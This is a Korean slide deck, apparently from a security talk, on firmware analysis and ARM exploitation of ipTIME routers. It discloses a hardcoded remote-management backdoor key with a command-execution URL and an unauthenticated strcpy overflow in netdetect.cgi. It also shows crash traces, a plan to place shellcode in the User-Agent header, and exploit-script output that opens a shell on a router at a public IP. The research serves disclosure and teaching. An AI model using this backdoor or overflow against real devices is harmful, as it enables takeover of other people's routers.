/var # cat boa_vh.conf Port 80 User root Group root ServerAdmin root@localhost VirtualHost DocumentRoot /home/httpd UserDir public_html DirectoryIndex index.html KeepAliveMax 100 KeepAliveTimeout 10 MimeTypes /etc/mime.types DefaultType text/plain AddType application/x-httpd-cgi cgi AddType text/html html ScriptAlias /cgi-bin/ /bin/ ScriptAlias /testbin/ /tmp/ ScriptAlias /nd-bin/ /ndbin/ ScriptAlias /login/ /bin/login/ ScriptAlias /ddns/ /bin/ddns/ ServerName "" SinglePostLimit 2097152 Auth /cgi-bin /etc/httpd.passwd Auth /main /etc/httpd.passwd /var # Boa Web server /var/boa_vh.conf

웹관리자페이지

/home/httpd /home/httpd # ls -al -rw-r--r-- 1 0 0 29 build_date -rw-r--r-- 1 0 0 5 version -rw-r--r-- 1 0 0 1 checkup -rwxr-xr-x 1 510 504 2109 mypage_menu.html -rwxr-xr-x 1 510 504 186 mypage.html -rwxr-xr-x 1 510 504 13642 time.v2.css lrwxrwxrwx 1 0 0 12 help -> /cramfs/help lrwxrwxrwx 1 0 0 10 js -> /cramfs/js lrwxrwxrwx 1 0 0 15 images2 -> /cramfs/images2 drwxr-xr-x 2 510 504 1024 192.168.0.1 -rwxr-xr-x 1 510 504 3536 time.css drwxr-xr-x 2 510 504 1024 192.168.255.1 drwxr-xr-x 2 510 504 1024 192.168.255.250 -rwxr-xr-x 1 510 504 112 index.html drwxr-xr-x 3 510 504 1024.. drwxr-xr-x 5 510 504 1024. /home/httpd #

/home/httpd /home/httpd # cat index.html <html> <head> <meta http-equiv=refresh content="0; URL=login/login.cgi"> <title></title> <body> </body> </html> /home/httpd #

IPTIME 의 CGI 들 /cramfs/bin # ls -al *.cgi -rwxr-xr-x 1 510 504 28600 wps_wizard.cgi -rwxr-xr-x 1 510 504 14372 upgrade.cgi -rwxr-xr-x 1 510 504 498128 timepro.cgi lrwxrwxrwx 1 0 0 16 start.cgi -> /bin/command.cgi lrwxrwxrwx 1 0 0 16 d.cgi -> /bin/timepro.cgi -rwxr-xr-x 1 510 504 16444 ated.cgi /cramfs/bin # /cramfs/bin # ls -al login/login.cgi -rwxr-xr-x 1 510 504 23428 login/login.cgi /cramfs/bin # / # ls -al /ndbin/*.cgi lrwxrwxrwx 1 0 0 16 /ndbin/netdetect.cgi -> /bin/timepro.cgi / # * 총 5 개의 cgi 파일존재

취약점탐색 ( 정적분석 ) Main(entry point) 를시작으로추적 Cross Reference 기반취약점탐색 Dangerous Functions strcpy strcat sprintf system execl getenv

취약점탐색 ( 동적분석 ) Dangerous Function 의호출실시간추적 ltrace strace gdb 가상 OS 혹은백도어, UART 등을이용한쉘활용 Cross compiler 로위바이너리들을컴파일한후기기에업로드

ARM 기반 Debugging 필요성 취약점탐색 Shellcode 가올라간주소찾기 Exploit 실패시원인분석 관련도구 ARM 용 gdb ARM 용 strace ARM 용 ltrace

Cross compile 테스트 root@grayhash:~# cat main.c int main() { } printf("hello world\n"); root@grayhash:~# root@grayhash:~# root@grayhash:~# arm-none-linux-gnueabi-gcc -o main main.c -static main.c: In function 'main': main.c:4:2: warning: incompatible implicit declaration of built-in function 'printf' [enabled by default] printf("hello world\n"); ^ root@grayhash:~# root@grayhash:~# file main main: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 2.6.16, not stripped root@grayhash:~# root@grayhash:~#

Cross compile 테스트 # rm rootfs.img.gz zimage # find. cpio -o --format=newc >../rootfs.img # gzip -c../rootfs.img > rootfs.img.gz # cp /root/zimage. # qemu-system-arm -M versatilepb -m 128M -kernel zimage -initrd rootfs.img.gz -append "root=/dev/ram rdinit=/bin/sh console=ttyama0,115200" -nographic -redir tcp:8080::80 - redir BusyBox v0.60.4 (2011.04.12-07:54+0000) Built-in shell (lash) Enter 'help' for a list of built-in commands. / # input: ImExPS/2 Generic Explorer Mouse as /devices/fpga:07/serio1/input/input2 / # / #./main hello world / #

strace 컴파일 https://sourceforge.net/projects/strace/files/strace/4.8/ export CC=/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin/armnone-linux-gnueabi-gcc export STRIP=/root/MentorGraphics/Sourcery_CodeBench_Lite_for_ARM_GNU_Linux/bin/arm -none-linux-gnueabi-strip./configure --host=arm-linux CFLAGS=-static make 파일시스템재구성 사용법./strace -i -f -p 285(HTTPD s PID)

프로세스실행 Monitoring strace -i f p PID e trace=execve

gdb & gdbserver 컴파일 wget https://ftp.gnu.org/gnu/gdb/gdb-6.8a.tar.gz 구버전 gcc 컴파일러필요 https://uclibc.org/downloads/binaries/0.9.30/cross-compiler-armv4l.tar.bz2 export CC=/root/cross-compiler-armv4l/bin/armv4l-gcc export STRIP=/root/cross-compiler-armv4l/bin/armv4l-strip ln -s /root/cross-compiler-armv4l/bin/armv4l-ar /bin/arm-linux-ar apt install texinfo termcap-1.3.1.tar.gz 설치후 cp libtermcap.a /root/ https://ftp.gnu.org/gnu/termcap/termcap-1.3.1.tar.gz./configure --host=arm-linux make vi./gdb-6.8/gdb/configure 6289 라인에추가 : ac_cv_search_tgetent="/root/libtermcap.a"./configure --host=arm-linux CFLAGS=-static (gdb-6.8 디렉토리안에서실행 ) make

ltrace 컴파일 http://pkgs.fedoraproject.org/repo/pkgs/ltrace/ltrace- 0.7.2.tar.bz2/f5d9282b471cdf9fbafd916ec5be0717/ export CC=/root/cross-compiler-armv4l/bin/armv4l-gcc export STRIP=/root/cross-compiler-armv4l/bin/armv4l-strip Libelf 설치 : http://www.mr511.de/software/libelf-0.8.13.tar.gz./configure --host=arm-linux make * 컴파일시많은에러가발생함, 다음페이지의 buildroot 를이용하길추천

Buildroot 의활용 Buildroot Root File System 구축을도와주는통합도구 http://buildroot.uclibc.org/downloads/buildroot- 2013.08.1.tar.gz tar xvfz make ARCH=arm menuconfig Target architecture => ARM (little endian) Target package => Debugging.. => strace, ltrace Save => exit make (ARCH, CROSS_COMPLIE 옵션 X)

외부파일다운로드 임베디드기기에파일을올릴때필요 Not exist wget, nc, scp, ftp, rz, Exist /sbin/http /sbin/http get http://ip/gdb > gdb

임베디드기기의용량문제 /var/run # df Filesystem 1k-blocks Used Available Use% Mounted on rootfs 443 120 298 29% / /dev/root 443 120 298 29% / /dev/cramfs 1216 1216 0 100% /cramfs /dev/ram1 219 2 205 1% /save /var/run # IPTIME G104 의경우, 바이너리의용량은대략 300kb 이하여야한다. 새로운바이너리를올리기에부족한용량.

용량제한탈출! / # mount rootfs on / type rootfs (rw) /dev/root on / type ext2 (rw) /dev/cramfs on /cramfs type squashfs (ro) proc on /proc type proc (rw) ramfs on /tmp type ramfs (rw) /dev/ram1 on /save type ext2 (rw) / # RAMFS => RAM 의남은용량만큼을파일시스템으로사용가능 / # cat /proc/meminfo MemTotal: 14720 kb MemFree: 6796 kb / #

발견된취약점! 원격관리용백도어 netdetect.cgi 의원격 Buffer Overflow 취약점 그외여러취약점들.. smtp command injection httpd apcpd

원격관리용백도어분석

원격관리용백도어 (old) 2007 년도에 ISSUE 가됐었음 (http://kldp.org/node/83510) 내부명령실행, 파일열람모두가능 디버깅과개발시편의성을위해만들어진페이지 (?)

원격관리용백도어 (new) 패스워드 (Key) 추가 리버싱을통해알아낼수있음 Setting value 추가 위두조건을만족시키면여전히접근가능

원격관리용백도어 (new) [timepro.cgi] The Key : aaksjdkfj=#notenoughmineral^

원격관리용백도어 (new)

원격관리용백도어 (new) 원격관리기능활성화 /etc # echo remote_support=1 >> /etc/iconfig.cfg http://192.168.0.1/cgibin/d.cgi?act=1&fname=&cmd=ls&aaksjd kfj=%23notenoughmineral%5e&dapply= +Show+

원격관리용백도어 (new)

Buffer Overflow 취약점분석

Remote Buffer Overflow Timepro.cgi == Netdetect.cgi (Symbolic Link)

Netdetect.cgi ( 관리자암호없이도접속가능 )

URL 파라미터처리부

Strcpy!!

Remote Buffer Overflow http://192.168.0.1/ndbin/netdetect.cgi?commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 혹은 http://192.168.0.1/ndbin/netdetect.cgi?flag=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 혹은 Content-Type = AAAAAAAAAAAAAAAAAAAAAAAAAAAA x1100

Remote Buffer Overflow /cramfs/ndbin # /strace -i /cramfs/ndbin/netdetect.cgi commit=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB ) = 171 [b6f9eed0] write(1, "\n", 1 ) = 1 [b6f9eed0] write(1, "\n", 1 ) = 1 [b6f9ee9c] read(3, "noline_box { padding:0px 0px 0px"..., 256) = 74 [b6f9eed0] write(1, ".noline_box { padding:0px 0px 0p"..., 75.noline_box { padding:0px 0px 0px 0px; border-style:none none none none; } ) = 75 [b6f9ee9c] read(3, "", 256) = 0 [b6f9ef38] close(3) = 0 [b6f9eed0] write(1, "</style></head>\n", 16</style></head> ) = 16 [b6f9ef04] open("/var/run/icv_check", O_RDONLY) = -1 ENOENT (No such file or directory) [b6f9eed0] write(1, "</html>\n", 8</html> ) = 8 [42424242] --- SIGSEGV {si_signo=sigsegv, si_code=segv_maperr, si_addr=0x42424242} --- [????????] +++ killed by SIGSEGV +++ /cramfs/ndbin #

Buffer Overflow 취약점 http:// 타겟 IP/nd-bin/netdetect.cgi?commit=AAAAAAAAAAAAAAAA~ Stack Memory Buffer BEFORE STRCPY() R11 SP LR AFTER STRCPY() aaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaaa LR(PC)

ShellCode 를어디에? 보안시스템확인 ASLR (X) DEP (X) STACK 과 HEAP 에서 Shellcode 실행가능 Stack Dump 최종대상선정 HTTP User-Agent Header

Buffer Overflow 취약점 aaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaa aaaa aaaa Buffer R11 SP LR(PC) 쉘코드를어디에올릴것인가? CGI 는환경변수에 HTTP 데이터를저장한다. User-Agent : utelnetd 구동, iptables 에서 telnet 허용쉘코드

ARM Exploitation

ARM assembly 함수호출 함수인자전달 지역스택확보 스택 push/pop base pointer Return address 전달 / 복귀 Shellcode 분석

ARM assembly #include <stdio.h> int my_func(int a, int b, int c) { int sum; sum = a+b+c; return sum; } void main() { int ret; } ret = my_func(1, 2, 3); printf("sum = %d\n", ret);

레지스터목록 (gdb) b *main Breakpoint 1 at 0x83e0 (gdb) r Starting program: /root/test Breakpoint 1, 0x000083e0 in main () Current language: auto; currently asm (gdb) info reg r0 0x1 1 r1 0xbefefe34 3204382260 r2 0xbefefe3c 3204382268 r3 0x0 0 r4 0x8408 33800 r5 0x0 0 r6 0x82d0 33488 r7 0x0 0 r8 0x0 0 r9 0x0 0 r10 0x40025000 1073893376 r11 0x0 0 r12 0x83e0 33760 sp 0xbefefdac 0xbefefdac lr 0x4003c06c 1073987692 pc 0x83e0 0x83e0 <main> fps 0x1001000 16781312 cpsr 0x60000010 1610612752 (gdb)

함수인자전달 (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

함수호출 (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

지역스택확보 (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

STACK PUSH/POP (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} // lr이먼저들어간다. 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

Base Pointer (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

Function call (gdb) disass main Dump of assembler code for function main: 0x00008474 <+0>: push {r11, lr} 0x00008478 <+4>: add r11, sp, #4 0x0000847c <+8>: sub sp, sp, #8 0x00008480 <+12>: mov r0, #1 0x00008484 <+16>: mov r1, #2 0x00008488 <+20>: mov r2, #3 0x0000848c <+24>: bl 0x8430 <my_func> 0x00008490 <+28>: str r0, [r11, #-8] 0x00008494 <+32>: ldr r3, [pc, #16] ; 0x84ac <main+56> 0x00008498 <+36>: mov r0, r3 0x0000849c <+40>: ldr r1, [r11, #-8] 0x000084a0 <+44>: bl 0x837c <printf> 0x000084a4 <+48>: sub sp, r11, #4 0x000084a8 <+52>: pop {r11, pc} End of assembler dump. (gdb)

Child function (gdb) disass my_func Dump of assembler code for function my_func: 0x00008430 <+0>: push {r11} ; (str r11, [sp, #-4]!) 0x00008434 <+4>: add r11, sp, #0 0x00008438 <+8>: sub sp, sp, #28 0x0000843c <+12>: str r0, [r11, #-16] 0x00008440 <+16>: str r1, [r11, #-20] 0x00008444 <+20>: str r2, [r11, #-24] 0x00008448 <+24>: ldr r2, [r11, #-16] 0x0000844c <+28>: ldr r3, [r11, #-20] 0x00008450 <+32>: add r2, r2, r3 0x00008454 <+36>: ldr r3, [r11, #-24] 0x00008458 <+40>: add r3, r2, r3 0x0000845c <+44>: str r3, [r11, #-8] 0x00008460 <+48>: ldr r3, [r11, #-8] 0x00008464 <+52>: mov r0, r3 0x00008468 <+56>: add sp, r11, #0 0x0000846c <+60>: pop {r11} ; (ldr r11, [sp], #4) 0x00008470 <+64>: bx lr (Link Register) End of assembler dump. (gdb)

bx VS bl b : branch 상대주소기반점프 bx : Branch and exchange 레지스터기반절대주소점프 bl : Branch with link 주소점프 ( 오프셋 ) + lr에 RET 저장 blx : Branch with link and exchange 레지스터점프 + lr 에 RET 저장

str and ldr ldr Load 특정주소에서값불러오기 EX> ldr r2, [r11, #-16] ( 방향 ) Str Store 특정주소에값저장하기 EX> str r0, [r11, #-16] ( 방향 )

ARM 기반 Buffer Overflow 공격방식 ARM 은 lr 레지스터를통해함수복귀를하기때문에기존의 stack buffer overflow 와는공격방식이조금다르다. ( 즉, RET 를 stack 에저장하지않는다!) [ 공격이가능한경우 ] 1. lr 을스택에저장하는경우 자식함수를호출하는경우현재 lr 을스택에저장 2. 다른함수의 stack frame 까지덮을수있는경우 대부분의경우가 1 번에해당 strcpy 등자식함수를호출하면서취약점이발생하므로

예제 1 (lr 을저장하지않는경우 ) int my_func(int a, int b, int c) { int sum; sum = a+b+c; } return sum;

예제 1 (lr 을저장하지않는경우 ) (gdb) disass my_func Dump of assembler code for function my_func: 0x00008430 <+0>: push {r11} ; (str r11, [sp, #-4]!) 0x00008434 <+4>: add r11, sp, #0 0x00008438 <+8>: sub sp, sp, #28 0x0000843c <+12>: str r0, [r11, #-16] 0x00008440 <+16>: str r1, [r11, #-20] 0x00008444 <+20>: str r2, [r11, #-24] 0x00008448 <+24>: ldr r2, [r11, #-16] 0x0000844c <+28>: ldr r3, [r11, #-20] 0x00008450 <+32>: add r2, r2, r3 0x00008454 <+36>: ldr r3, [r11, #-24] 0x00008458 <+40>: add r3, r2, r3 0x0000845c <+44>: str r3, [r11, #-8] 0x00008460 <+48>: ldr r3, [r11, #-8] 0x00008464 <+52>: mov r0, r3 0x00008468 <+56>: add sp, r11, #0 0x0000846c <+60>: pop {r11} ; (ldr r11, [sp], #4) 0x00008470 <+64>: bx lr End of assembler dump. (gdb)

예제 2 (lr 을저장하는경우 ) int my_func(int a, int b, int c) { int sum; sum = a+b+c; } printf("hi\n"); return sum;

예제 2 (lr 을저장하는경우 ) (gdb) disass my_func Dump of assembler code for function my_func: 0x00008460 <+0>: push {r11, lr} 0x00008464 <+4>: add r11, sp, #4 0x00008468 <+8>: sub sp, sp, #24 0x0000846c <+12>: str r0, [r11, #-16] 0x00008470 <+16>: str r1, [r11, #-20] 0x00008474 <+20>: str r2, [r11, #-24] 0x00008478 <+24>: ldr r2, [r11, #-16] 0x0000847c <+28>: ldr r3, [r11, #-20] 0x00008480 <+32>: add r2, r2, r3 0x00008484 <+36>: ldr r3, [r11, #-24] 0x00008488 <+40>: add r3, r2, r3 0x0000848c <+44>: str r3, [r11, #-8] 0x00008490 <+48>: ldr r0, [pc, #16] ; 0x84a8 <my_func+72> 0x00008494 <+52>: bl 0x83ac <puts> 0x00008498 <+56>: ldr r3, [r11, #-8] 0x0000849c <+60>: mov r0, r3 0x000084a0 <+64>: sub sp, r11, #4 0x000084a4 <+68>: pop {r11, pc} End of assembler dump. (gdb)

Remote Exploiting IPTIME! Iptime_exploit.py [root@hackerschool ~]# python iptime_exploit.py 220.118.164.5 [+] UpnP_Port Good [+] upnp Requesting -80- [-] Perhaps good [+] upnp Requesting -23- [-] Perhaps good [+] Port Mapping Good [+] Attacking. Please Wait... [+] Router Pwned!! [+] 220.118.164.5 TELNET port Opened [+] Let's Teleport to it Trying 220.118.164.5... Connected to 220.118.164.5 (220.118.164.5). Escape character is '^]'. BusyBox v0.60.4 (2011.04.12-07:54+0000) Built-in shell (lash) Enter 'help' for a list of built-in commands. / # ls al lrwxrwxrwx 1 0 0 11 bin -> /cramfs/bin lrwxrwxrwx 1 0 0 12 sbin -> /cramfs/sbin drwxr-xr-x 3 510 504 1024 home drwxr-xr-x 5 510 504 1024 etc drwxr-xr-x 3 510 504 1024 dev drwxr-xr-x 10 0 0 83 cramfs / #

결론 임베디드장비취약점분석절차요약 대상선정 펌웨어획득 파일의구조이해 사용자입력가능바이너리탐색 바이너리분석및취약점탐지 디버깅 Exploit 개발

감사합니다!